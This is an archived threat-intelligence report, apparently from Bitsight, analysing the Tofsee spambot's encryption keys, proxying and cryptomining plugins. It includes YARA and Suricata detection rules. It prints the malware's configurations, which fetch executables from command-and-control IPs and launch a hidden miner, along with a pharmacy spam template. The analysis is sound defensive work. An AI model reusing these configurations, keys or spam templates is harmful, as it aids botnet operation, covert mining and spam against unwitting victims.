{
	"id": "aedc086e-be91-45d9-8095-d69c018f9b8c",
	"created_at": "2026-04-06T00:10:48.388097Z",
	"updated_at": "2026-04-10T13:11:45.311671Z",
	"deleted_at": null,
	"sha1_hash": "bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c",
	"title": "Tofsee Botnet: Proxying and Mining | Bitsight",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 813323,
	"plain_text": "Tofsee Botnet: Proxying and Mining | Bitsight\r\nBy André Tavares, Sr. Threat Researcher\r\nArchived: 2026-04-05 14:42:28 UTC\r\nBitsight has recently observed a 15-year-old modular spambot called Tofsee being distributed by PrivateLoader (ruzki), a notorious malware distribution service we also closely monitor.\r\nBitsight has noticed Tofsee engaging in web traffic proxying, with a small percentage of it being email spam related traffic, and also performing cryptocurrency mining.\r\nBitsight's partial visibility over its botnet of infected machines suggests that it is spread worldwide, with a significant percentage of infections in India.\r\nIn January 2023, PrivateLoader, a malware loader from a pay-per-install malware distribution service called “ruzki”, started to distribute Tofsee (a.k.a. Gheg), a modular spambot. Spambots are typically utilized by cybercriminals to spread malware and phishing emails, and this particular one has been in operation since at least 2008. Due to its modular architecture, Tofsee is capable of performing a wide range of tasks once it receives instructions to do so (as it did in the past), such as denial of service attacks and click fraud. The samples are packed but can be easily unpacked. Unpacking denotes the last stage in which the main functionality of the malicious software is exposed. Threat actors make use of packers when distributing their malware as they remain an effective way to evade detection.\r\nAs revealed by CERT.pl, the malware downloads two types of resources (updates) from its command-and-control (C2) server: configurations, and plugins to extend its functionality. After trying to decrypt the packet capture from a sandbox run of the sample to understand what resources have recently been fetched, we were getting high entropy data, signaling that something in the protocol may have changed. One of the first guesses was that the hardcoded 7-byte-lowercase-only-letters encryption key “abcdefg” might have changed.\r\nTo understand if that was the case, we tried to search for the key in the binary, but couldn’t find it. Going deeper, statically analyzing the sample using a disassembler, right in the main function, one of the first functions called (Fig. 1) looks like a string decryption function and is called 67 times throughout the code. After implementing it in Python and testing one of the calls to it, a plaintext string is indeed returned.\r\nhttps://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\r\nPage 1 of 10\r\nFigure 1 - Tofsee string decryption function.\r\nAfter a while spent looking through the binary, trying to find code related to the communication protocol, we eventually found and decrypted another 7-byte-lowercase-only-letters string, “qazwsxed”. This one gives low entropy data (many null bytes, for example). With this knowledge, we could decrypt 28 resources downloaded by the malware once it starts running (Table 1). Some resources were compressed, so we had to find and reverse the decompression algorithm used.\r\nConfigs: blist_cfg, blist_doms, blist_ips, ID4011378458, miner_cfg, port_cfg, priority, proxy_cfg, ps_otlups_hm, ps_otlups_ya, psmtp_cfg, RT_1, RT_2, RT_AD, smtp_ban, smtp_herr, smtp_retr, start_srv, sys_cfg, time_cfg, work_srv\r\nPlugins: blist.dll (Am I blocklisted?), miner.dll, sys.dll (updater), proxyR.dll, smtp.dll, text.dll (process email templates), xmrcpu.exe\r\nTable 1 - Resources downloaded by Tofsee.\r\nThe “proxyR” and “miner” plugins were the only ones that had network activity. The “smtp” plugin needs extra configurations to be able to generate and send spam, specifically resources of type 7 (general purpose macros), 8 (local macros), and 11 (template scripts), which we never encountered in a two-month period.\r\nRegarding the proxy plugin, we extracted a configuration payload (Code 1) with 6 IPs located in Russia. Looking at the same packet capture previously mentioned, after trying to decrypt the TCP streams related to those IPs, we were again getting high entropy data. Looking at the proxy plugin DLL, there is yet another 7-byte-lowercase-only-letters string, “prcbsrv”. After decrypting the packets with it, the streams revealed HTTP(S) and SOCKS(4/5) requests sent from those IPs to the bot, which leads us to believe those are addresses of backconnect servers. A backconnect proxy server is a server that utilizes a pool of proxies (in this case, the Tofsee botnet) to perform requests on behalf of the user.\r\nversion 8\r\nclient.timeout_connect 30\r\nclient.timeout_read 60\r\nclient.timeout_write 60\r\nserver.sleep_connect 30\r\nserver.timeout_connect 30\r\nserver.timeout_read 60\r\nserver.timeout_write 60\r\ntarget.timeout_connect 30\r\ntarget.timeout_read 60\r\ntarget.timeout_write 60\r\nALL.max_threads 32\r\nALL.min_threads 1\r\nALL.num_services 6\r\nALL.percent_of_online 100\r\nALL.release_unused_thr_after 60\r\nALL.service00 176.113.115.239:416/16\r\nALL.service01 176.113.115.154:416/16\r\nALL.service02 176.113.115.155:416/16\r\nALL.service03 80.66.75.4:416/16\r\nALL.service04 176.113.115.135:416/16\r\nALL.service05 176.113.115.136:416/16\r\nCode 1 - Configuration for the proxy plugin (proxy_cfg).\r\nMost of the traffic is over HTTPS to popular websites, including several Russian ones. Figure 2 lists the top hostnames contacted by the bot.\r\nFigure 2 - Most requested HOST:PORT pairs.\r\nWhile looking through the traffic, we spotted an interesting pattern. Around 3% of the requests were HTTP POST with the URI ending in “.php” and, in many cases, starting with “/wp-”, to random websites that appear legitimate. Each request’s payload starts with the string “ce=” followed by a base64-encoded spam template (similar to Code 2). The response to the request was usually a 200 OK with “*send:ok*” as payload. These indicators lead us to believe that these (apparently) legitimate websites have likely been compromised and are being used to distribute spam.\r\nem=@aol.com,@icloud.com,@hotmail.com,@yahoo.com,\r\n@micromedint.com,@hotmail.com,@yahoo.com.hk,\r\n@hotmail.com,@sfr.fr,@msn.com,@yahoo.com,\r\n@yahoo.com,@comcast.net,@aol.com,@sfr.fr,\r\n@yahoo.fr,@yahoo.com,@msn.com,@aol.com,\r\n@hotmail.com,@gmail.com,@yahoo.com,@comcast.net,\r\n@aol.com,@hotmail.com,@yahoo.com,@hotmail.fr,\r\n@hotmail.com,@hotmail.com,@hotmail.com,@sfr.fr,\r\n@free.fr,@hotmail.com,@hotmail.com,@hotmail.com,\r\n@yahoo.com,@hotmail.com,@comcast.net,@libero.it,\r\n@hotmail.it,@sunrise.ch,@aol.com,@hotmail.com,\r\n@hotmail.it,@hotmail.com,@hotmail.co.uk,@hotmail.com,\r\n@aol.com,@bellsouth.net,@yahoo.com,@hotmail.com,\r\n@gmail.com,@yahoo.com,@aol.com,@orange.fr,\r\n@gmail.com,@yahoo.com,@yahoo.com,@aol.com,\r\n@fuse.net,@aol.com,@olguin.cc,@hotmail.fr,\r\n@aol.com,@live.com,@yahoo.co.uk,@planet.nl,\r\n@aol.com,@aol.com,@aol.com,@yahoo.com,\r\n@yahoo.com,@att.net,@yahoo.com,@gmail.com,\r\n@gmx.de,@aol.com,@hotmail.com,@gmail.com,\r\n@hotmail.com,@yahoo.com\u0026s=Product of the day\u0026f={rand:24x7 Pharmacy|Pharmacy 24x7|Pharmacy USA|USA Pharmacy} - {rand:Final Price|Super Deals|Best Deals|Discounter}\u0026sn=1\u0026rpt=\u0026tp=1\u0026m=\r\n\r\nGood morning. How are you my dear.\r\n\r\nNoone will stay indifferent! Get Dream's Pills here.\r\n\r\n[CLICK HERE TO ORDER NOW](https://ajwhvdhk.page.link/NiG75YhjQHn1sYXXA)\r\nCode 2 - Spam template sent to a (most likely) compromised website.\r\nAnother 3% of the traffic was SMTP(S) spam traffic which can be categorized as \"romance scam\" or \"dating scam\", which included photo attachments of the supposed sender. In short, all spam activity was done exclusively through the proxy module. Regarding the “smtp” plugin, although it’s still being sent to the bots, we haven’t seen any activity from it so far.\r\nRegarding the miner plugin, we extracted a configuration payload (Code 3) containing some URLs. None seem to work, except “fastpool.xyz”, and the references to them on Google are old.\r\nversion 12\r\ndownload_period 100\r\nneedmacrs $xmrcpu\r\nkills cores_gt_1\r\ntasks cores_gt_1\r\ngrabb.download_id 9\r\ngrabb.ifs\r\ngrabb.size_min 200000\r\ngrabb.size_max 350000\r\ngrabb.run $grabb\r\ngrabb.flags NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\r\ngrabb.next_success\r\ngrabb.next_error\r\ngrabb.next_conditions\r\nlitecoin.download_id 9\r\nlitecoin.ifs\r\nlitecoin.urls http://103.15.106.221/rnm226.php;http://188.190.114.21/rnm226.php;http://111.121.193.238/rnm238.php\r\nlitecoin.path %USERPROFILE%\\%RND_char[4-6].exe\r\nlitecoin.size_min 200000\r\nlitecoin.size_max 350000\r\nlitecoin.run\r\nlitecoin.flags NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\r\ncores_gt_1.ifs COND_CORES_GT_1\r\ncores_gt_1.path svchost.exe\r\ncores_gt_1.size_min 200000\r\ncores_gt_1.size_max 4000000\r\ncores_gt_1.run $xmrcpu\r\ncores_gt_1.args -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tm -p x -k -a cn/half\r\ncores_gt_1.flags NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\r\ncores_gt_1.next_success\r\ncores_gt_1.next_error\r\ncores_gt_1.next_conditions\r\none_core.ifs\r\none_core.url http://130.185.108.137/pchfv.php\r\none_core.path %USERPROFILE%\\do.exe\r\none_core.size 223744\r\none_core.run \"%USERPROFILE%\\do.exe\" %MINER_LOGIN2 -g yes -t 1 -w 300\r\none_core.flags BELOW_NORMAL_PRIORITY_CLASS CREATE_NO_WINDOW\r\nCode 3 - Configuration for the miner plugin (miner_cfg).\r\nMoreover, there is only activity to “fastpool.xyz:10060”, which is a mining pool for Masari (MSR), a privacy-focused cryptocurrency that aims to provide secure, private, and untraceable transactions (Fig. 3).\r\nFigure 3 - MSR mining pool documentation\r\nThe mining pool website has some statistics on the botnet’s mining work (Fig. 4). In total so far, to this address, the Tofsee botnet was able to mine ~200 000 MSR, which currently corresponds to ~1500$. By searching for the wallet address on Google, the first reference is from June 2022.\r\nFigure 4 - MSR mining pool documentation\r\nBitsight's partial visibility over the geographical distribution of the Tofsee botnet in March 2023 suggests that it’s present worldwide, with a significant percentage of infections in India (33%), as Figure 5 shows.\r\nFigure 5 - Approximation of Tofsee botnet distribution in March 2023.\r\nThe data used to populate this map is sampled, which means that the actual geographical distribution of Tofsee may be close to this one but not exactly what this map suggests.\r\nTofsee remains a persistent threat to organizations worldwide, with its primary focus recently being the proxying of web traffic and cryptocurrency mining. However, its modular design also allows it to be used for a variety of other malicious activities, including spam campaigns and distributed denial of service (DDoS) attacks, as seen in the past. As such, it is crucial for organizations to remain vigilant in their cybersecurity efforts and take steps to mitigate the risk of Tofsee infection. Bitsight will continue to monitor the threat landscape closely and provide updates on new developments related to Tofsee and other emerging threats.\r\nAll indicators of compromise and detection signatures can be found here.\r\nTofsee malware/bot/core sample unpacked: 96baba74a907890b995f23c7db21568f7bfb5dbf417ed90ca311482b99702b72\r\nYARA rule:\r\nThe unpacked binary contains a lot of interesting plaintext strings that can be used to write a YARA rule to detect the malware. The following 7-year-old rule does the job well:\r\nrule win_tofsee\r\n{\r\n    meta:\r\n        author = \"akrasuski1\"\r\n        published_at = \"https://gist.github.com/akrasuski1/756ae39f96d2714087e6d7f252a95b19\"\r\n        revision_by = \"andretavare5\"\r\n        description = \"Tofsee malware\"\r\n        org = \"BitSight\"\r\n        date = \"2023-03-24\"\r\n        md5 = \"92e466525e810b79ae23eac344a52027\"\r\n        reference = \"https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining\"\r\n        license = \"CC BY-NC-SA 4.0\"\r\n    strings:\r\n        $decryptStr = {32 55 14 88 10 8A D1 02 55 18 F6 D9 00 55 14}\r\n        $xorGreet = {C1 EB 03 C0 E1 05 0A D9 32 DA 34 C6 88 1E}\r\n        $xorCrypt = {F7 FB 8A 44 0A 04 30 06 FF 41 0C}\r\n        $string_res1 = \"loader_id\"\r\n        $string_res2 = \"born_date\"\r\n        $string_res3 = \"work_srv\"\r\n        $string_res4 = \"flags_upd\"\r\n        $string_res5 = \"lid_file_upd\"\r\n        $string_res6 = \"localcfg\"\r\n        $string_var0 = \"%RND_NUM\"\r\n        $string_var1 = \"%SYS_JR\"\r\n        $string_var2 = \"%SYS_N\"\r\n        $string_var3 = \"%SYS_RN\"\r\n        $string_var4 = \"%RND_SPACE\"\r\n        $string_var5 = \"%RND_DIGIT\"\r\n        $string_var6 = \"%RND_HEX\"\r\n        $string_var7 = \"%RND_hex\"\r\n        $string_var8 = \"%RND_char\"\r\n        $string_var9 = \"%RND_CHAR\"\r\n    condition:\r\n        (7 of ($string_var*) and 4 of ($string_res*))\r\n        or (7 of ($string_var*) and 2 of ($decryptStr, $xorGreet, $xorCrypt))\r\n        or (4 of ($string_res*) and 2 of ($decryptStr, $xorGreet, $xorCrypt))\r\n}\r\nString decryption function in Python:\r\ndef decrypt(enc_str, key1, key2):\r\n    # key1 is the running XOR byte, key2 the per-byte increment\r\n    out = []\r\n    for i in range(len(enc_str)):\r\n        out.append(key1 ^ enc_str[i])\r\n        # the key step alternates between key2 - 1 (odd i) and key2 + 1 (even i)\r\n        if i % 2:\r\n            key1 = (key1 + key2 - 1) \u0026 0xFF\r\n        else:\r\n            key1 = (key1 + key2 + 1) \u0026 0xFF\r\n    return bytes(out)\r\n\r\nenc_str = bytes.fromhex('B1FE316F549FDB1B6DA1F17D')\r\nkey1 = 0xE4\r\nkey2 = 0xC8\r\nprint(decrypt(enc_str, key1, key2))\r\n# \u003e\u003e\u003e b'USERPROFILE\\x00'\r\nSuricata rule:\r\nThe following Suricata rules detect the malware communicating with its C2 server:\r\nalert tcp $EXTERNAL_NET any -\u003e $HOME_NET any ( msg:\"BitSight MALWARE Possible Tofsee Server Hello\"; flow:established,from_server; dsize:200; flowbits:set,TOFSEE_C2_GREET; flowbits:noalert; reference:url,malpedia.caad.fkie.fraunhofer.de/details/win.tofsee; sid:2008025; rev:1;)\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any ( msg:\"BitSight MALWARE Tofsee Hello\"; flow:established,from_client; dsize:125; flowbits:isset,TOFSEE_C2_GREET; reference:url,malpedia.caad.fkie.fraunhofer.de/details/win.tofsee; sid:2008026; rev:1;)\r\nSource: https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.bitsight.com/blog/tofsee-botnet-proxying-and-mining"
	],
	"report_names": [
		"tofsee-botnet-proxying-and-mining"
	],
	"threat_actors": [],
	"ts_created_at": 1775434248,
	"ts_updated_at": 1775826705,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c.pdf",
		"text": "https://archive.orkl.eu/bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c.txt",
		"img": "https://archive.orkl.eu/bd4f2a3fefd4ae664df2429053d0bb5aacd4b54c.jpg"
	}
}